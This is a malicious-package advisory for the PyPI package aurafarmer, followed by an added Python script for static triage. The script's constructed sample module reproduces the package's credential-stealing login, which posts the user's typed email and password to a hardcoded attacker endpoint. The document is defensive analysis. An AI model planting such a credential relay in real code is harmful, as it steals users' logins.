aurafarmer @0.3.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4741
Ecosystem
pypi
Summary
The package advertises an aurex CLI. Its login flow (aurex/main.py around line 108) prompts the user for email and password and POSTs them as JSON to a hardcoded endpoint, https://spruky.qzz.io/aurafarmer/endpoint, defined in aurex/config.py line 5. The destination is a free dynamic-DNS host (qzz.io) with no published reputation and no relationship to any documented Aurex service; the README does not disclose the network destination. Any user who follows the documented login UX silently transmits plaintext credentials (commonly reused across services) to an author-controlled host. The PyPI distribution name (aurafarmer) does not match the CLI/import/brand name (aurex); the README even instructs pip install aurex while this distribution is published as aurafarmer, increasing the likelihood the distribution is positioned to be confused with a different project. Caller-supplied secrets flowing to a hardcoded, undisclosed, author-controlled endpoint is the silent-relay shape.
Source: amazon-inspector (967bdc07ba43b92a320ad0ef81975a5547d24b987eda5b8cdf863fc7c18245e0)
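The three observations the advisory rests on (a URL literal bound to a name in a config module, user-prompted secrets reaching a network call whose destination is that name, and a distribution name that disagrees with the import name) can be checked statically before a package is ever run. The script below is an added example of that triage, not code from the aurafarmer/aurex package or from osv.dev. The two module strings are constructed to mirror the advisory's description, not copied from the real package, and the trusted-host list is a reviewer-supplied assumption; nothing here touches the network.

```python
"""Static triage for the silent-relay shape: user-typed secrets flowing to a
hardcoded endpoint inside a distribution whose PyPI name and import name
disagree. Added example; not the package's or osv.dev's code. SAMPLE_CONFIG and
SAMPLE_MAIN are CONSTRUCTED stand-ins that mirror the advisory's prose."""
import ast
import re
from urllib.parse import urlparse

# Constructed stand-in for aurex/config.py: a URL literal bound to a name.
SAMPLE_CONFIG = 'API_URL = "https://spruky.qzz.io/aurafarmer/endpoint"\n'

# Constructed stand-in for the login flow in aurex/main.py.
SAMPLE_MAIN = '''
import requests
from getpass import getpass
from .config import API_URL

def login():
    email = input("Email: ")
    password = getpass("Password: ")
    r = requests.post(API_URL, json={"email": email, "password": password})
    return r.status_code
'''

URL_RE = re.compile(r"^https?://", re.I)
SECRET_SOURCES = {"input", "getpass"}            # calls that read user-typed secrets
NETWORK_SINKS = {"post", "put", "request", "urlopen"}


def hardcoded_urls(source):
    """Map NAME -> url for every `NAME = "http(s)://..."` assignment in a module."""
    found = {}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant):
            value = node.value.value
            if isinstance(value, str) and URL_RE.match(value):
                for target in node.targets:
                    if isinstance(target, ast.Name):
                        found[target.id] = value
    return found


def _callee(call):
    """Bare callee name for `f(...)` or `obj.f(...)`, else None."""
    func = call.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def secret_relays(source, known_urls):
    """Return (sink, destination, tainted_vars) for each network call whose
    arguments reference a name that was assigned from input()/getpass()."""
    tree = ast.parse(source)
    tainted = set()
    for node in ast.walk(tree):                  # pass 1: taint secret-bearing names
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Call):
            if _callee(node.value) in SECRET_SOURCES:
                tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    hits = []
    for node in ast.walk(tree):                  # pass 2: sinks consuming tainted names
        if not (isinstance(node, ast.Call) and _callee(node) in NETWORK_SINKS and node.args):
            continue
        arg_nodes = node.args + [kw.value for kw in node.keywords]
        used = sorted({n.id for arg in arg_nodes for n in ast.walk(arg)
                       if isinstance(n, ast.Name) and n.id in tainted})
        if not used:
            continue
        dest = node.args[0]                      # first positional arg is the URL
        if isinstance(dest, ast.Constant) and isinstance(dest.value, str):
            url = dest.value
        elif isinstance(dest, ast.Name):
            url = known_urls.get(dest.id, "<unresolved %s>" % dest.id)
        else:
            url = "<dynamic>"
        hits.append((_callee(node), url, used))
    return hits


def triage(dist_name, import_name, config_src, main_src, trusted_hosts=()):
    """Combine the checks into reviewer-facing findings (a list of strings)."""
    findings = []
    if dist_name.lower() != import_name.lower():
        findings.append("name mismatch: distribution %r vs import %r" % (dist_name, import_name))
    urls = hardcoded_urls(config_src)
    urls.update(hardcoded_urls(main_src))
    for sink, url, secrets in secret_relays(main_src, urls):
        findings.append("secret relay: %s(%s) carries %s" % (sink, url, ", ".join(secrets)))
        host = urlparse(url).hostname
        if host and host not in trusted_hosts:   # trusted_hosts is the reviewer's assumption
            findings.append("undisclosed destination: %s not in trusted hosts" % host)
    return findings


if __name__ == "__main__":
    for line in triage("aurafarmer", "aurex", SAMPLE_CONFIG, SAMPLE_MAIN):
        print(line)
```

On the constructed samples this reports the name mismatch, the POST that carries email and password to the config URL, and the destination host not being on the trusted list. The taint tracking is deliberately shallow (direct assignment from input()/getpass() only), so a package that launders the secret through a helper or string formatting would need the sink check extended; a real review should also run it over the downloaded sdist rather than a README, since the README is exactly what this package uses to misdirect.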